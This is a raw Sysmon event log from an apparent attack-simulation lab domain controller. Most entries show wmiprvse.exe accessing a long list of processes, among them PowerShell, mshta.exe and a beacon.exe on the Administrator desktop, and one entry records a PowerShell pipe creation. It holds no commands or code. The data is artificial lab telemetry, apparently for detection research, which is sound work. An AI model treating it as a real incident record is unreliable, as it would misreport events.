16:54:42.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242349Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002242348Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:42.733{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944\PSHost.132591776825914466.3944.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002242347Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242346Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242345Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242344Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242343Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242342Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242341Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242340Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242339Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242338Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242337Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242336Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242335Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242334Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242333Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242332Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242331Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242330Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 